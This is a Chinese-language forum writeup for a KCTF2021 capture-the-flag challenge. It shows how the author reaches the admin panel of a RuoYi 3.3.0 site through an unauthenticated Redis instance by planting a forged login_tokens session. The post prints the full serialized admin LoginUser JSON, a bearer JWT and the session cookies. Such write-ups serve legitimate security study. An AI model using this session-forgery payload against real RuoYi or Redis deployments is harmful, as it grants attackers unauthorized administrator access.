首页
社区
课程
招聘
[原创]KCTF2021 第三题 统一门派 writeup
2021-5-13 19:32 4953

[原创]KCTF2021 第三题 统一门派 writeup

2021-5-13 19:32
4953

半天打开网站,似曾相识 若依


先去官网下源代码,尝试可匿名访问的路径

确定若依版本 3.3.0


扫端口:

6379 redis 无密码


代码审计发现身份认证逻辑依赖redis,可通过添加redis键值伪造session信息


本地搭建环境,生成可用redis键值


连上KctfRedis:添加键值

login_tokens:1794d721-4eb1-4a7e-af46-da6261bf1301

{"@type":"com.ruoyi.common.core.domain.model.LoginUser","accountNonExpired":true,"accountNonLocked":true,"browser":"Chrome 9","credentialsNonExpired":true,"enabled":true,"expireTime":1620905711016,"ipaddr":"127.0.0.1","loginLocation":"内网IP","loginTime":1620903911016,"os":"Windows 10","password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2","permissions":Set["*:*:*"],"token":"1794d721-4eb1-4a7e-af46-da6261bf1301","user":{"admin":true,"avatar":"","createBy":"admin","createTime":1620902433000,"delFlag":"0","dept":{"children":[],"deptId":103,"deptName":"研发部门","leader":"若依","orderNum":"1","params":{"@type":"java.util.HashMap"},"parentId":101,"status":"0"},"deptId":103,"email":"ry@163.com","loginDate":1620902433000,"loginIp":"127.0.0.1","nickName":"若依","params":{"@type":"java.util.HashMap"},"password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2","phonenumber":"15888888888","remark":"管理员","roles":[{"admin":true,"dataScope":"1","deptCheckStrictly":false,"flag":false,"menuCheckStrictly":false,"params":{"@type":"java.util.HashMap"},"roleId":1,"roleKey":"admin","roleName":"超级管理员","roleSort":"1","status":"0"}],"sex":"1","status":"0","userId":1,"userName":"admin"},"username":"admin"}


浏览器打开登录页


请求时添加Header

Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjE3OTRkNzIxLTRlYjEtNGE3ZS1hZjQ2LWRhNjI2MWJmMTMwMSJ9.cpGOHk67ZpPqx6UrTEV6aJUPyxfWVe9NxeR9owsC1jffoZ9E3Sx_H1tGSy81HENOfaCe4NXoXaOxnKrJ55AmmA


Cookie:

_user_behavior_=1794d721-4eb1-4a7e-af46-da6261bf1301; Admin-Token=1794d721-4eb1-4a7e-af46-da6261bf1301




刷新网页成功进入管理页



[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2021-5-14 10:14 被Wblank编辑 ,原因:
收藏
免费 2
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回